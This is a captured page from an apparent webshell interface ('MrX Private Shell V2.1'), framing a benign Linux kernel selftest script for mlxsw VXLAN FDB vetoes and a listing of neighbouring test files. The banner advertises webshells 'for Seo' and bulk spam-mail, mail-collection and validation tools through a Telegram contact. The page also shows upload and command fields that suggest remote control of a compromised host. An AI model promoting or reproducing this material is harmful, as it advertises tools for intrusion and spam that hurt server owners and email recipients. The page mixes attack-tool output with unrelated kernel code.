__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/bash
# SPDX-License-Identifier: GPL-2.0
#
# Test vetoing of FDB entries that mlxsw can not offload. This exercises several
# different veto vectors to test various rollback scenarios in the vxlan driver.

: ${LOCAL_IP:=198.51.100.1}
export LOCAL_IP

: ${REMOTE_IP_1:=198.51.100.2}
export REMOTE_IP_1

: ${REMOTE_IP_2:=198.51.100.3}
export REMOTE_IP_2

: ${UDPCSUM_FLAFS:=noudpcsum}
export UDPCSUM_FLAFS

: ${MC_IP:=224.0.0.1}
export MC_IP

lib_dir=$(dirname $0)/../../../net/forwarding

ALL_TESTS="
	fdb_create_veto_test
	fdb_replace_veto_test
	fdb_append_veto_test
	fdb_changelink_veto_test
"
NUM_NETIFS=2
source $lib_dir/lib.sh

setup_prepare()
{
	swp1=${NETIFS[p1]}
	swp2=${NETIFS[p2]}

	ip link add dev br0 type bridge mcast_snooping 0

	ip link set dev $swp1 up
	ip link set dev $swp1 master br0
	ip link set dev $swp2 up

	ip link add name vxlan0 up type vxlan id 10 nolearning $UDPCSUM_FLAFS \
		ttl 20 tos inherit local $LOCAL_IP dstport 4789
	ip link set dev vxlan0 master br0
}

cleanup()
{
	pre_cleanup

	ip link set dev vxlan0 nomaster
	ip link del dev vxlan0

	ip link set dev $swp2 down
	ip link set dev $swp1 nomaster
	ip link set dev $swp1 down

	ip link del dev br0
}

fdb_create_veto_test()
{
	RET=0

	bridge fdb add 01:02:03:04:05:06 dev vxlan0 self static \
	       dst $REMOTE_IP_1 2>/dev/null
	check_fail $? "multicast MAC not rejected"

	bridge fdb add 01:02:03:04:05:06 dev vxlan0 self static \
	       dst $REMOTE_IP_1 2>&1 >/dev/null | grep -q mlxsw_spectrum
	check_err $? "multicast MAC rejected without extack"

	log_test "vxlan FDB veto - create"
}

fdb_replace_veto_test()
{
	RET=0

	bridge fdb add 00:01:02:03:04:05 dev vxlan0 self static \
	       dst $REMOTE_IP_1
	check_err $? "valid FDB rejected"

	bridge fdb replace 00:01:02:03:04:05 dev vxlan0 self static \
	       dst $REMOTE_IP_1 port 1234 2>/dev/null
	check_fail $? "FDB with an explicit port not rejected"

	bridge fdb replace 00:01:02:03:04:05 dev vxlan0 self static \
	       dst $REMOTE_IP_1 port 1234 2>&1 >/dev/null \
	    | grep -q mlxsw_spectrum
	check_err $? "FDB with an explicit port rejected without extack"

	log_test "vxlan FDB veto - replace"
}

fdb_append_veto_test()
{
	RET=0

	bridge fdb add 00:00:00:00:00:00 dev vxlan0 self static \
	       dst $REMOTE_IP_1
	check_err $? "valid FDB rejected"

	bridge fdb append 00:00:00:00:00:00 dev vxlan0 self static \
	       dst $REMOTE_IP_2 port 1234 2>/dev/null
	check_fail $? "FDB with an explicit port not rejected"

	bridge fdb append 00:00:00:00:00:00 dev vxlan0 self static \
	       dst $REMOTE_IP_2 port 1234 2>&1 >/dev/null \
	    | grep -q mlxsw_spectrum
	check_err $? "FDB with an explicit port rejected without extack"

	log_test "vxlan FDB veto - append"
}

fdb_changelink_veto_test()
{
	RET=0

	ip link set dev vxlan0 type vxlan \
	   group $MC_IP dev lo 2>/dev/null
	check_fail $? "FDB with a multicast IP not rejected"

	ip link set dev vxlan0 type vxlan \
	   group $MC_IP dev lo 2>&1 >/dev/null \
	    | grep -q mlxsw_spectrum
	check_err $? "FDB with a multicast IP rejected without extack"

	log_test "vxlan FDB veto - changelink"
}

trap cleanup EXIT

setup_prepare
setup_wait

tests_run

exit $EXIT_STATUS

Filemanager

Name Type Size Permission Actions
spectrum Folder 0755
spectrum-2 Folder 0755
blackhole_routes.sh File 4.96 KB 0755
devlink_linecard.sh File 7.5 KB 0755
devlink_trap.sh File 1.86 KB 0755
devlink_trap_acl_drops.sh File 2.4 KB 0755
devlink_trap_control.sh File 18.22 KB 0755
devlink_trap_l2_drops.sh File 12.87 KB 0755
devlink_trap_l3_drops.sh File 16.38 KB 0755
devlink_trap_l3_exceptions.sh File 13.64 KB 0755
devlink_trap_policer.sh File 9.75 KB 0755
devlink_trap_tunnel_ipip.sh File 5.24 KB 0755
devlink_trap_tunnel_ipip6.sh File 5.31 KB 0755
devlink_trap_tunnel_vxlan.sh File 8.84 KB 0755
devlink_trap_tunnel_vxlan_ipv6.sh File 9.32 KB 0755
egress_vid_classification.sh File 6.55 KB 0755
ethtool_lanes.sh File 4.02 KB 0755
extack.sh File 3.74 KB 0755
fib.sh File 5.43 KB 0755
fib_offload.sh File 9.93 KB 0755
hw_stats_l3.sh File 410 B 0755
ingress_rif_conf_1d.sh File 6.15 KB 0755
ingress_rif_conf_1q.sh File 6.23 KB 0755
ingress_rif_conf_vxlan.sh File 8.44 KB 0755
mirror_gre.sh File 3.78 KB 0755
mirror_gre_scale.sh File 5.43 KB 0644
mlxsw_lib.sh File 1.43 KB 0644
one_armed_router.sh File 6.82 KB 0755
pci_reset.sh File 1.27 KB 0755
port_range_occ.sh File 2.33 KB 0755
port_range_scale.sh File 1.51 KB 0644
port_scale.sh File 1.36 KB 0644
q_in_q_veto.sh File 8.06 KB 0755
qos_defprio.sh File 2.33 KB 0755
qos_dscp_bridge.sh File 4.14 KB 0755
qos_dscp_router.sh File 6.43 KB 0755
qos_ets_strict.sh File 9.09 KB 0755
qos_headroom.sh File 8.19 KB 0755
qos_lib.sh File 1.27 KB 0644
qos_max_descriptors.sh File 6.14 KB 0755
qos_mc_aware.sh File 9.54 KB 0755
qos_pfc.sh File 11.36 KB 0755
rif_bridge.sh File 4.12 KB 0755
rif_counter_scale.sh File 1.71 KB 0644
rif_lag.sh File 2.98 KB 0755
rif_lag_vlan.sh File 3.24 KB 0755
rif_mac_profile_scale.sh File 1.64 KB 0644
rif_mac_profiles.sh File 4.65 KB 0755
rif_mac_profiles_occ.sh File 2.87 KB 0755
router_bridge_lag.sh File 786 B 0755
router_scale.sh File 2.09 KB 0644
rtnetlink.sh File 26.93 KB 0755
sch_ets.sh File 2.3 KB 0755
sch_offload.sh File 5.25 KB 0755
sch_red_core.sh File 20.75 KB 0644
sch_red_ets.sh File 3.12 KB 0755
sch_red_prio.sh File 81 B 0755
sch_red_root.sh File 1.25 KB 0755
sch_tbf_ets.sh File 216 B 0755
sch_tbf_prio.sh File 217 B 0755
sch_tbf_root.sh File 217 B 0755
sharedbuffer.sh File 5.24 KB 0755
tc_action_hw_stats.sh File 2.24 KB 0755
tc_flower_scale.sh File 2.81 KB 0644
tc_police_occ.sh File 2.07 KB 0755
tc_police_scale.sh File 1.62 KB 0644
tc_restrictions.sh File 11.58 KB 0755
tc_sample.sh File 17.38 KB 0755
vxlan.sh File 30.19 KB 0755
vxlan_fdb_veto.sh File 3.11 KB 0755
vxlan_fdb_veto_ipv6.sh File 250 B 0755
vxlan_flooding.sh File 8.64 KB 0755
vxlan_ipv6.sh File 1.39 KB 0755
Filemanager